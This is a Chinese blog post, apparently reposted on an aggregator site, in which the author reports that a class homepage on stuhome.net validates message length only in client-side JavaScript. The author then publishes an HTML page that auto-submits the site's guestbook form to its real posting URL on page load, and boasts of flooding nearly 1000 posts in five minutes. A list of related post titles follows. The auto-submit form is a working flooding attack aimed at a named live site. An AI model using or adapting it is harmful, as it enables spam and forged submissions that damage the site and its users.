发现星辰个漏洞
来源:互联网 发布:pc游戏优化 编辑:程序博客网 时间:2024/06/10 03:08
看到班长发的指标了,每人每天向班级主页灌水5帖。真是汗颜哇.......
恩,抽了个时间看了下,突然发现了个星辰的小错误.....
他们把样式表,js放在开头.....你用yslow测一下你的效率,以后还是做个单独的js和css文件然后require进去,他们几乎把该页面的信息全部都告诉了你,因为你看它的源代码几乎什么都可以看到了.
还有,就算你写js再来个最多发表150个字,gbook.php里面验证了用户输入了没有??都则删了你的js再提交可以提交多少字都是可以的...
没花多少时间,写了个自动提交表单的网页,直接点后退就可以灌水了,测试了下,5分钟大概灌了将近1000的帖,还算可以啦,虽然麻烦了点.代码具体如下:
/************网页灌水***************/
<script>
function put(){
document.commentForm.submit();//貌似只能提交英文,不能提交中文.
}
</script>
<body onload='put();'>
<form name="commentForm" id="commentForm" method="post" action="http://stuhome.net/classcreate/classspace/gbook_post.php" >
<textarea name="gbook_content" id="gbook_content">
..........
</textarea>
<input name="touserid" id="touserid" type="hidden" value="no">
<input name="Submit" type="submit" class="button1" value="发 表"/>
</form>
以后还是不要用cookie了呵呵
- 发现星辰个漏洞
- 发现多个远程控制服务 可欺骗漏洞(ALLyeSNO)
- 发现一个java漏洞!!!
- bbsxp漏洞发现过程
- 发现的新漏洞
- 发现重大CSDN漏洞!!!!
- 发现-Struts2的漏洞
- 漏洞扫描/发现
- IE的javascript 漏洞 ,今天为了找个弹出窗口的代码偶然发现的
- 针对ACCESS漏洞又一发现
- Opera浏览器发现'高危'漏洞
- xss漏洞发现及利用
- xss漏洞发现及利用
- xss漏洞发现及利用
- 用extjs发现ie漏洞
- 发现新浪一注册漏洞
- 发现outlook的一个小漏洞
- 我发现CSDN的一个漏洞
- Linux中简单配置Samba服务器
- 点滴记录
- 感想
- fceditor PHP版的配置
- Http Handler 介绍
- 发现星辰个漏洞
- 国际:写一手容易理解的代码是否很重要?
- 应用程序使用远程数据库
- apache优化
- comboBox的Item选项值与文本的获取
- 解决黑屏方案
- yslow提高网页的技巧
- 10-20
- xp下的vpn设置